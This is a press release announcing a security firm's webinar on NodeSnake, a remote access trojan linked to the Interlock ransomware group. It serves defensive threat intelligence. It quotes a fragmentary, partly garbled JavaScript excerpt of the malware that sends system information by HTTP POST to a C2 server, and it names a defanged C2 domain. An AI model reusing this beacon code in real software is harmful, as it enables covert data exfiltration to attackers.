

Quorum Cyber Hosts Live Webinar on Remote Access Trojan Malware NodeSnake

Attendees Receive Actionable Defense Strategies for Universities, Local Governments & Public Sector Companies Facing New RAT Malware

TAMPA, FL, UNITED STATES, June 17, 2025 /EINPresswire.com/ -- Quorum Cyber, a global, threat-led cybersecurity firm, will host a live webinar on Tuesday, June 24th, 2025, at 11 AM EDT / 4 PM BST. The 45-minute webinar, which will include a live Q&A session with Quorum Cyber's Threat Intelligence team members who discovered NodeSnake, will cover their latest findings on the Remote Access Trojan (RAT) variant and malware strain strongly linked to the Interlock ransomware group. RAT and malware strains have been used to compromise the higher education sector and are believed to be targeting the public sector as well. Attendees may register for NodeSnake Explained: How to Detect and Defend Against It at <https://bit.ly/4kBMn7g>.

A screenshot of a code editor showing JavaScript code for NodeSnake. The code defines a function to make an HTTP POST request to a predefined C2 server. It includes headers for 'Content-Type' and 'Content-Length'. The code uses the 'http' module and a Promise to handle the request and its response, logging the headers and status code, and pushing data chunks to an array.

```
t: port,
h: '/init1234',
hod: 'POST',
ders: {
  'Content-Type': 'application/octet-stream',
  'Content-Length': sysinfo.length,
}

new Promise((resolve, reject) => {
  st req = http.request(options, (res) => {
    const data = [];
    console.log(res.headers);
    console.log('StatusCode:', res.statusCode);
    res.on('data', (chunk) => {
      data.push(chunk);
    });
  });
})
```

NodeSnake connects to predefined C2 servers, including Cloudflare-proxied domains (e.g. `sublime-forecasts-pale-scored.trycloudflare[.]com`) and hard-coded IP addresses.

Attendees will leave the webinar equipped to defend themselves from NodeSnake and Interlock. They will have the opportunity to ask Quorum Cyber's experts – Principal Incident Responder Mark Cunningham-Dickie and Threat Intelligence Analyst Michael Forrest – questions to:

- Gain valuable insights into NodeSnake and Interlock.
- Understand how to protect their IT estate from the malware and threat actor.
- Learn how to strengthen their cybersecurity posture and cyber resilience.

Can't attend the webinar?

Access additional valuable content:

-Read the in-depth blog: [A Deep Dive into NodeSnake: the Devil is in the Detail](#).

-Download the [NodeSnake Malware Report](#) from Quorum Cyber's Threat Intelligence Community.

About Quorum Cyber

Quorum Cyber is on a mission to help good people win. Founded in Edinburgh in 2016, we've become one of the fastest-growing cybersecurity companies, protecting over 400 customers across four continents. We deliver tailored, threat-led cybersecurity services that empower organizations to stay ahead of attackers, align security with business goals, and thrive in an unpredictable digital world.

As a Microsoft Solutions Partner for Security and winner of the Microsoft Security MSSP of the Year 2025 award, our expertise runs as deep as our commitment to better cybersecurity outcomes. In 2024, Quorum Cyber brought this commitment to a global scale through the acquisitions of Difenda and Kivu in North America.

With Quorum Cyber, resilience isn't just a journey – it's a guarantee. Learn more at www.quorumcyber.com or contact info@quorumcyber.com.

###

Betsey Rogers

Bridgeview Marketing

betsey@bridgeviewmarketing.com

Visit us on social media:

[LinkedIn](#)

[X](#)

This press release can be viewed online at: <https://www.einpresswire.com/article/822772659>

EIN Presswire's priority is source transparency. We do not allow opaque clients, and our editors try to be careful about weeding out false and misleading content. As a user, if you see something we have missed, please do bring it to our attention. Your help is welcome. EIN Presswire, Everyone's Internet News Presswire™, tries to define some of the boundaries that are reasonable in today's world. Please see our Editorial Guidelines for more information.

© 1995-2025 Newsmatics Inc. All Right Reserved.